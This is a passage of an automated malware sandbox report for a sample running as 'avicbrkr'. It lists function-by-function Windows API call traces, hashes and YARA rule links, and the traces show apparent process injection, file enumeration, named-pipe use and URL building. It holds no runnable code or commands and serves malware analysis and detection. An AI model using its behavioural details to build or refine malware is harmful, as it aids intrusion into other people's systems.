                        • Part of subcall function 0037976C: memcpy.NTDLL(?,00000000,0037AE2C), ref: 00379929
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 0037993F
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 00379963
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 003799A5
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 003799C4
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,0039E415,?,?,0037AE2C,00397048,00000000), ref: 003799E3
                        • Part of subcall function 0037976C: StrChrA.SHLWAPI(00000000,0000003B), ref: 003799F9
                        • Part of subcall function 0037976C: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 00379A0E
                        • Part of subcall function 0037976C: memmove.NTDLL(00000000,00000000,0037AE2C,?,?,?,?,?,?,?,0039E415,?,?,0037AE2C,00397048,00000000), ref: 00379A33
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379A7E
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00379A9A
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,0039D4F9,-00000008,?,?,?,?,?,?,?,?,0039E415,?,?,0037AE2C,00397048), ref: 00379AB9
                        • Part of subcall function 0037976C: StrChrA.SHLWAPI(00000000,0000002C), ref: 00379ACC
                        • Part of subcall function 0037976C: StrTrimA.SHLWAPI(00000000,003973F4), ref: 00379AE5
                        • Part of subcall function 0037976C: StrTrimA.SHLWAPI(?,003973F4), ref: 00379AF3
                        • Part of subcall function 0037976C: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00379B02
                        • Part of subcall function 0037976C: StrToIntExA.SHLWAPI(?,00000000,?), ref: 00379B1D
                        • Part of subcall function 0037976C: memmove.NTDLL(0039D500,00000000,0037AE2C,?,?,?,?,?,?,?,?,?,?,?,0039E415,?), ref: 00379B51
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379B9D
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00379BB9
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,0039D4F9,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,0039E415), ref: 00379BD8
                        • Part of subcall function 0037976C: memmove.NTDLL(0039D500,00000000,0037AE2C,00000000,00000001), ref: 00379C1B
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379C67
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00379C83
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,0039D4FB,-00000006), ref: 00379CA2
                        • Part of subcall function 0037976C: memmove.NTDLL(0039D500,00000000,0037AE2C), ref: 00379CD7
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379D16
                      • HeapFree.KERNEL32(00000000,?), ref: 0037A1BE
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037A1D3
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$Allocate$memmove$Trim$CloseCreatelstrlenwsprintf
                      • String ID:
                      • API String ID: 1423086-0
                      • Opcode ID: 9bf6c9cc6a597d063c9ec1eacc0bdcfe31eb3a8a7d522f818901d2f9b5345fbc
                      • Instruction ID: dae3b729723c7abbdc1225dc09e79a7f2959843f32c3a6d90b42648e7a7a31de
                      • Opcode Fuzzy Hash: 9bf6c9cc6a597d063c9ec1eacc0bdcfe31eb3a8a7d522f818901d2f9b5345fbc
                      • Instruction Fuzzy Hash: 4751A0B6D00119EFDF12DF94DC858EEBBB9FB48344F10846AE509A2260D33A5E90DF61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037DE1D, Relevance: 10.6, APIs: 7, Instructions: 123memorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • StrChrA.SHLWAPI(00000000,00000020), ref: 0037DE47
                      • StrTrimA.SHLWAPI(00000000,003973FC), ref: 0037DE5D
                        • Part of subcall function 00373D02: HeapFree.KERNEL32(00000000,?,?), ref: 00373D85
                      • RtlImageNtHeader.NTDLL(?), ref: 0037DE85
                      • HeapFree.KERNEL32(00000000,?), ref: 0037DEAF
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 0037196A: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 003719D5
                        • Part of subcall function 0037196A: HeapFree.KERNEL32(00000000,00000000), ref: 003719FD
                      • lstrlen.KERNEL32(00000000,00000000,?), ref: 0037DF17
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037DF46
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0037DF64
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$lstrlen$FileTime$CloseCurrentHeaderImageNameSystemTempThreadTrimlstrcpymemcpymemset
                      • String ID:
                      • API String ID: 1859285976-0
                      • Opcode ID: add02612de0bd4f63faf8d3b8efb5dd999aeef1a08001ab4c81f1237c2ef4c52
                      • Instruction ID: bf4350f4b2e693690588f9d0c3906b8a8248b2e263b885e9e56469bf66936675
                      • Opcode Fuzzy Hash: add02612de0bd4f63faf8d3b8efb5dd999aeef1a08001ab4c81f1237c2ef4c52
                      • Instruction Fuzzy Hash: 4031F532204301BBD7337B24AC4AF6B7ABDEF84B51F054429F58D5A1D0DB6A8C44D752
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038B8D2, Relevance: 10.6, APIs: 7, Instructions: 112synchronizationthreadCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 0038B92E
                      • memcpy.NTDLL(0000002C,?,00000010,00000000,00000000,00000054,00000054), ref: 0038B93C
                      • RtlInitializeCriticalSection.NTDLL(00000008), ref: 0038B948
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B95B
                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B975
                      • CreateThread.KERNEL32(00000000,00000000,0038B64A,?,00000000,00000000), ref: 0038B9BF
                      • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 0038B9DF
                        • Part of subcall function 0038BA07: SetEvent.KERNEL32(?,00371F20,?,0039D270,?,00000000,003713EB), ref: 0038BA1B
                        • Part of subcall function 0038BA07: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038BA35
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA3E
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA4C
                        • Part of subcall function 0038BA07: RtlEnterCriticalSection.NTDLL(00000008), ref: 0038BA58
                        • Part of subcall function 0038BA07: RtlLeaveCriticalSection.NTDLL(00000008), ref: 0038BA81
                        • Part of subcall function 0038BA07: Sleep.KERNEL32(000001F4), ref: 0038BA90
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA9D
                        • Part of subcall function 0038BA07: LocalFree.KERNEL32(?), ref: 0038BAAB
                        • Part of subcall function 0038BA07: RtlDeleteCriticalSection.NTDLL(00000008), ref: 0038BAB5
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseCreateHandle$Event$AllocateDeleteEnterErrorFreeHeapInitializeLastLeaveLocalMutexObjectSingleSleepThreadWaitmemcpymemset
                      • String ID:
                      • API String ID: 4282890707-0
                      • Opcode ID: b212f210f14a27a83d6de94fc095f8b24c38702b86c7f61495af92620c948c7e
                      • Instruction ID: 670c40c46e8acc89273d92ff8d681624001a63cbe7b576983e12b13cdd254e06
                      • Opcode Fuzzy Hash: b212f210f14a27a83d6de94fc095f8b24c38702b86c7f61495af92620c948c7e
                      • Instruction Fuzzy Hash: 2131C471500712AFC332AF668C89917FBFCFB85765F144A1EF6A6C2290E37298458B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371F67, Relevance: 10.6, APIs: 7, Instructions: 110memoryfilestringCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedIncrement.KERNEL32(0039D19C), ref: 00371F79
                      • lstrcpy.KERNEL32(00000000), ref: 00371FAE
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                        • Part of subcall function 0038E3FE: memset.NTDLL ref: 0038E412
                      • HeapFree.KERNEL32(00000000,?), ref: 00372056
                        • Part of subcall function 0038E5EC: memset.NTDLL ref: 0038E647
                        • Part of subcall function 0038E5EC: SetLastError.KERNEL32(00000000,?,?,?), ref: 0038E69B
                        • Part of subcall function 0038E5EC: WaitForSingleObject.KERNEL32(?,?), ref: 0038E81A
                        • Part of subcall function 0038E5EC: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 0038E82B
                      • GetLastError.KERNEL32(00000000), ref: 0037203F
                      • InterlockedDecrement.KERNEL32(0039D19C), ref: 0037206D
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037209E
                        • Part of subcall function 003779BC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                        • Part of subcall function 003779BC: lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                        • Part of subcall function 003779BC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                        • Part of subcall function 003779BC: mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                        • Part of subcall function 003779BC: CloseHandle.KERNEL32(?), ref: 00377A61
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • DeleteFileA.KERNEL32(00000000), ref: 0037208E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFree$ErrorInterlockedLastTimelstrcpylstrlenmemset$AllocateCloseCreateCurrentDecrementDeleteHandleIncrementNameObjectSingleSleepSystemTempThreadWaitmbstowcs
                      • String ID:
                      • API String ID: 3667511681-0
                      • Opcode ID: 90a124533ff260b25fbdd79a9428b1857d57cf0892dc0c6bf3f0d00c910b98e8
                      • Instruction ID: d05feae4d4def69f7c98502bcb8e098bea451553f1734835de467fa3408306cf
                      • Opcode Fuzzy Hash: 90a124533ff260b25fbdd79a9428b1857d57cf0892dc0c6bf3f0d00c910b98e8
                      • Instruction Fuzzy Hash: CC310A32900214FBCB33AFA5DC45AAE7A79EF48750F118056F909EB290D77A8E41D7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00375A61, Relevance: 10.6, APIs: 7, Instructions: 109stringsleepmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00375A17: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375A1F
                        • Part of subcall function 00375A17: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375A34
                        • Part of subcall function 00375A17: InterlockedIncrement.KERNEL32(0000001C), ref: 00375A4D
                      • lstrlen.KERNEL32(00000008,?,?,?,003741E9,00000000,00000000), ref: 00375AC1
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00375AE3
                      • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,003741E9,00000000,00000000), ref: 00375AF5
                      • lstrcpy.KERNEL32(00000020,00000008), ref: 00375B27
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375B33
                      • Sleep.KERNEL32(0000000A), ref: 00375B3D
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375B8B
                        • Part of subcall function 003759AC: InterlockedDecrement.KERNEL32(0000001C), ref: 003759B0
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterInterlockedLeave$DecrementFreeHeapIncrementSleeplstrcpylstrlenmemcpy
                      • String ID:
                      • API String ID: 1050082636-0
                      • Opcode ID: 62f60a4e8ecc9d61eb4844974b69805259a9190b95a13f3dc076f2db65c72d10
                      • Instruction ID: 48d5278a6a6fe9b7c6a77967813c8eae7bc647dbe81716f659ac437ed795b72a
                      • Opcode Fuzzy Hash: 62f60a4e8ecc9d61eb4844974b69805259a9190b95a13f3dc076f2db65c72d10
                      • Instruction Fuzzy Hash: C84158B1510B05EFCB279F64DC85B6ABBF8FF08315F11851AE80997260D7BADA50CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377394, Relevance: 10.6, APIs: 7, Instructions: 91memorystringsynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003773DE
                      • memset.NTDLL ref: 003773FB
                      • WaitForSingleObject.KERNEL32(00000000), ref: 00377417
                      • GetDriveTypeW.KERNEL32(?), ref: 00377425
                      • lstrlenW.KERNEL32(?), ref: 00377431
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                      • lstrlenW.KERNEL32(?), ref: 0037745E
                      • HeapFree.KERNEL32(00000000,?), ref: 00377477
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$ObjectSingleWaitmemset$CloseCriticalFirstHeapNextSectionlstrlen$AllocateDriveEnterFreeLeaveTypewcscpy
                      • String ID:
                      • API String ID: 1952197925-0
                      • Opcode ID: 50d0efd8d1c66b4a7cf0b68643ad40931a071eadff9e95f5f07a591a829e189f
                      • Instruction ID: 91f58927fbb42283b4ea3102ebf7ee00a7114b05f2840b0ec162dbb0481cc827
                      • Opcode Fuzzy Hash: 50d0efd8d1c66b4a7cf0b68643ad40931a071eadff9e95f5f07a591a829e189f
                      • Instruction Fuzzy Hash: C1314B7291410CBFDF12ABA5EC85CEEBBBDEF04354F208466F505E2260D736AE549B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037C038, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                      • RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                      • memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                      • memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                      • CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                      • GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                      • String ID:
                      • API String ID: 2237239663-0
                      • Opcode ID: 6e9b9fbc5af2de9492a915b40c7eca31999fe5f343b75c8800a90eb89600d461
                      • Instruction ID: 826a75083492633f921a56e686ffb26e2f6d9ede572ada0947372210645d1c57
                      • Opcode Fuzzy Hash: 6e9b9fbc5af2de9492a915b40c7eca31999fe5f343b75c8800a90eb89600d461
                      • Instruction Fuzzy Hash: F731A036910209EFDB22DFA5DC45AAB7BBCFB04750F00843AFA4992250E339D954DBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00386FE8, Relevance: 10.6, APIs: 7, Instructions: 89filesynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32 ref: 00387032
                      • WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                      • WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                      • SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                      • GetLastError.KERNEL32(?,?,?), ref: 003870D0
                      • CloseHandle.KERNEL32(?), ref: 003870DC
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$CloseHandleObjectPointerSingleWaitWrite
                      • String ID:
                      • API String ID: 2772011183-0
                      • Opcode ID: 2a6b46eec59cb5b55b9812063fd27f72f2b4d442502c0d982c14d6cb6cf2ffbd
                      • Instruction ID: df9dd668917ee9f3c61caa351e6cc90a30b2eac286aa7851111f10cbfaa7fd4f
                      • Opcode Fuzzy Hash: 2a6b46eec59cb5b55b9812063fd27f72f2b4d442502c0d982c14d6cb6cf2ffbd
                      • Instruction Fuzzy Hash: 9E3181B1914308FFEB229FA5DC09BAE7B79EB04325F204555F911A21E0C3718E449B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377C48, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87memoryfilestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • lstrlen.KERNEL32(00000000,?,00000F00), ref: 00377C6C
                        • Part of subcall function 00377A7F: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00377AA5
                        • Part of subcall function 00377A7F: HeapFree.KERNEL32(00000000,?,00000000), ref: 00377B09
                      • StrTrimA.SHLWAPI(00000000,0039740C), ref: 00377CF6
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 00377D13
                      • DeleteFileA.KERNEL32(00000000,00000000,?,?,0039EE29,00000000,?,00000F00), ref: 00377D1B
                      • HeapFree.KERNEL32(00000000,00000000,0039EE29), ref: 00377D2A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFree$Timelstrlen$AllocateCurrentDeleteNameSystemTempThreadTrimlstrcpymemcpymemset
                      • String ID: ss: *.*.*.*
                      • API String ID: 3832528039-2676197480
                      • Opcode ID: bc50f57ada28eab68d58cdac83d9daec3d13a21e13c49e47677f2e928c6b0689
                      • Instruction ID: d7fe3ea6b4c2a8236600d80756f27ae571d899a5d8399d6919afc7b1459628e5
                      • Opcode Fuzzy Hash: bc50f57ada28eab68d58cdac83d9daec3d13a21e13c49e47677f2e928c6b0689
                      • Instruction Fuzzy Hash: 22213272A04205BFDB22EFE9DC85FEF7BACAF58310F050465F509E6251E6759A048760
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038D759, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                        • Part of subcall function 0038875C: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                        • Part of subcall function 0038875C: CloseHandle.KERNEL32(00000000), ref: 0038879B
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,pnls), ref: 0038D784
                      • GetLastError.KERNEL32 ref: 0038D801
                        • Part of subcall function 0038D5E3: memset.NTDLL ref: 0038D605
                        • Part of subcall function 0038D5E3: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 0038D69C
                        • Part of subcall function 0038D5E3: WaitForSingleObject.KERNEL32(00000064), ref: 0038D6AA
                        • Part of subcall function 0038D5E3: SuspendThread.KERNEL32(?), ref: 0038D6C2
                        • Part of subcall function 0038D5E3: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 0038D737
                        • Part of subcall function 0038D5E3: ResumeThread.KERNEL32(?), ref: 0038D748
                      • CloseHandle.KERNEL32(?), ref: 0038D7F9
                      • CloseHandle.KERNEL32(?), ref: 0038D813
                      • GetLastError.KERNEL32 ref: 0038D81B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastProcessThread$OpenResume$ObjectSingleSuspendWaitWow64memset
                      • String ID: pnls
                      • API String ID: 1160281849-141991303
                      • Opcode ID: b546bada66c2a57b7ec836c382397c61f3a8998cb1717b0b747b5f179d1c4914
                      • Instruction ID: 11f6ca29724e21531dfa8b7a48865849b065fa4f194b342d5ff5554463172fb0
                      • Opcode Fuzzy Hash: b546bada66c2a57b7ec836c382397c61f3a8998cb1717b0b747b5f179d1c4914
                      • Instruction Fuzzy Hash: 26215E72914369BFDF137FA4DC898AEBBB8EB44354F0149B6F901A22A0D6724D048B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00378002, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00378064
                      • memcpy.NTDLL(00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 0037808A
                      • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 00378099
                      • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 003780AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$AllocateHeap
                      • String ID: http://$https://
                      • API String ID: 4068229299-1916535328
                      • Opcode ID: 249e8e6ee7a20dcb52f1d484212b8621e8a35c34de73809b299db449438b2c79
                      • Instruction ID: 74b9800d0ffbc23ab22b179e5a2b96103ed6f3506623e9a493a412148f82e8e5
                      • Opcode Fuzzy Hash: 249e8e6ee7a20dcb52f1d484212b8621e8a35c34de73809b299db449438b2c79
                      • Instruction Fuzzy Hash: AF218172940215BBDF339FA8CC45F9ABBACEF04784F158052F904DB251EA75DD858B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0063493A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00634958
                      • GetFileSize.KERNEL32(00000000,00000000,?,!Cc,00632BAA,0063763C,00000000,00000000,?,00000000,0063306A,?,?), ref: 00634968
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00634994
                      • GetLastError.KERNEL32(?,!Cc,00632BAA,0063763C,00000000,00000000,?,00000000,0063306A,?,?), ref: 006349B9
                      • CloseHandle.KERNEL32(000000FF), ref: 006349CA
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$Heap$AllocateCloseCreateErrorFreeHandleLastReadSize
                      • String ID: !Cc
                      • API String ID: 3493789272-3374438881
                      • Opcode ID: a10890df6a114c137252ac828cc0f771be988618bf38c8d75638ad95e9dbde9e
                      • Instruction ID: 9d8d65b33ca5be758a37f09b649443def841ce5a5d2315db59de38d854c323ee
                      • Opcode Fuzzy Hash: a10890df6a114c137252ac828cc0f771be988618bf38c8d75638ad95e9dbde9e
                      • Instruction Fuzzy Hash: 02118472500214BFDB215F64CC89BEFBB9FEB45364F114625F915972A0DA70AD418AE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003779BC, Relevance: 10.6, APIs: 7, Instructions: 71memoryfilestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 003777C6: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0037787C
                        • Part of subcall function 003777C6: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0037789D
